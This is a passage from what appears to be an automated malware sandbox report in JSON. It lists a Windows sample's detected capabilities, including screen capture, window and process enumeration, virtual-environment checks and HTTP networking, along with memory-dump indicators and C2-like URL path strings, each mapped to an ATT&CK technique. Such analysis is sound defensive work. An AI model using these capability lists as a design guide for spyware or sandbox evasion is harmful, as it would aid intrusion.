"string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n file/memory contains long string with (Indicator: \"findwindow\"; File: \"908501218x27.dll\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"908501218x27.dll\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"GetNativeSystemInfo\" (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"IsWow64Process\" with parameter \"4528\" - (UID: 00000000-00004528)\n \"cmd.exe\" called \"IsWow64Process\" with parameter \"4936\" - (UID: 00000000-00004936)\n \"rundll32.exe\" called \"IsWow64Process\" with parameter \"4920\" - (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004528)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004936)\n \"cmd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004936)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004920)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" with parameter \"CiceroUIWndFrame\" - (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" with parameter \"Start\" - (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" with parameter \"Network Flyout\" - (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" with parameter \"Task Switching\" - (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" with parameter \"Start menu\" - (UID: 00000000-00004528)\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetWindowTextA\" with parameter \"TF_FloatingLangBar_WndTitle\" - (UID: 00000000-00004528)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetSystemDirectoryW\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"GetFileAttributesW\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDC\" (Indicator: \"GetDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateDCA\" (Indicator: \"CreateDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetDC\" (Indicator: \"GetDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"CreateDCA\" (Indicator: \"CreateDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"rundll32.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"RegEnumValueA\" (Indicator: \"RegEnumValue\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"RegEnumValueA\" (Indicator: \"RegEnumValue\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")\n Found reference to API \"GetModuleHandleW\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-131", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the specified system metric or system configuration setting (API string)", "description": "Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-115", "type": 2, "relevance": 3, "name": "Contains ability to retrieve data about the local computer (API string)", "description": "Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"NtOpenProcessToken\" (Indicator: \"NtOpenProcessToken\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"NtOpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")\n Found reference to API \"NtQueryInformationToken\" (Indicator: \"NtQueryInformationToken\"; Source: \"00000000-00004920.00000000.138847.00AD1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rundll32.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 908501218x27.dll]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: x27x.dll]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"flash.asp/wmgmb.asp/wmrmb.asp/getgif.aspaction=up&zt=internetopenurla\\wininet.dllinternetconnectasetfilepointer\\kernel32.dllvirtualprotectofflineok&uofflineonline&onlineisonlinecontent-type:application/x-www-form-urlencodedaccept\"\n Heuristic match: \"se;.wsf;.ws\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-539", "type": 2, "relevance": 1, "name": "Contains reference to Windows internet services (API string)", "description": "Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://content-type:\" - Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"HttpSendRequestExA\" (Indicator: \"HttpSendRequest\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; File: \"c14b685409ba77161297904148ff44448f4d4cf2fa8ae116146b098141c4dad4\")\n Found reference to API \"InternetReadFile\" (Indicator: \"InternetReadFile\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"HttpQueryInfoA\" (Indicator: \"HttpQueryInfo\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"InternetOpenA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"HttpSendRequestA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"HttpSendRequestExA\" (Indicator: \"HttpSendRequest\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"InternetConnectA\" (Indicator: \"InternetConnect\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp, 00000000-00004528.00000000.138687.10005000.00000002.mdmp\")\n Found reference to API \"InternetOpenUrlA\" (Indicator: \"InternetOpen\"; Source: \"00000000-00004528.00000000.138687.00404000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, 